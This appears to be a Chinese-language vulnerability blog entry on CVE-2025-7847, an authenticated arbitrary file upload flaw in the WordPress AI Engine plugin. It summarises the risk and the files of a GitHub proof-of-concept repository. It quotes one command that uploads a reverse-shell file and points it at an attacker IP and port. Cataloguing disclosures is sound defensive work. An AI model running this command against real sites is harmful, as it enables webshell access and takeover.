WordPress Plugin AI Engine Authenticated Subscriber Arbitrary File Upload Vulnerability

漏洞信息

漏洞名称： WordPress Plugin AI Engine Authenticated Subscriber Arbitrary File Upload Vulnerability

漏洞编号：

CVE： CVE-2025-7847

漏洞类型： 文件上传

漏洞等级： 高危

漏洞描述： 该漏洞影响WordPress插件AI Engine，版本2.9.3至2.9.4。AI Engine是一个为WordPress网站提供人工智能功能的插件，广泛应用于内容创作、SEO优化等领域。由于其功能的便利性，许多网站管理员选择安装此插件以增强网站的用户体验和内容管理能力。漏洞类型为文件上传漏洞，技术根源在于插件未能充分验证订阅者用户上传的文件类型和内容，导致攻击者可以上传恶意文件，如PHP webshell，进而执行任意代码。这一漏洞的危害性较高，因为攻击者可以利用订阅者级别的权限上传恶意文件，无需管理员权限即可实现攻击。成功利用此漏洞可能导致网站被完全控制，数据泄露，甚至成为攻击者进一步攻击内网的跳板。由于漏洞利用需要认证，但订阅者权限较易获取，因此在实际攻击中仍具有较高的可利用性。

产品厂商： WordPress

产品名称： AI Engine

影响版本： 2.9.3 <= version <= 2.9.4

来源： https://github.com/EricArdiansa/CVE-2025-7847---Wordpress-Plugin-Authenticated-Subscriber-Arbitrary-File-Upload-POC

类型： CVE-2025:github search

仓库文件

LICENSE
README.md
exploit-auto.py
exploit-manual.py
exploit.py
reverse.php
shell.php

来源概述

CVE-2025-7847—Wordpress-Plugin-Authenticated-Subscriber-Arbitrary-File-Upload-POC

Wordpress Plufgin AI Engine 2.9.3 - 2.9.4 Proof Of Concept

1	`python3 exploit-auto.py --url "http://localhost/wordpress" --username "Admin" --password "L87A79cwC*N9@FKC4u" --file reverse.php --attacker-ip 127.0.0.1 --attacker-port 4444`

Github Poc

#文件上传 #CVE-2025:github search

WordPress Plugin AI Engine Authenticated Subscriber Arbitrary File Upload Vulnerability

http://example.com/2025/08/02/github_195517028/

作者

lianccc

发布于

2025年8月2日

许可协议

Wordpress Plugin AI Engine Authenticated Subscriber Arbitrary File Upload Vulnerability 上一篇

Demo web server 文件上传漏洞下一篇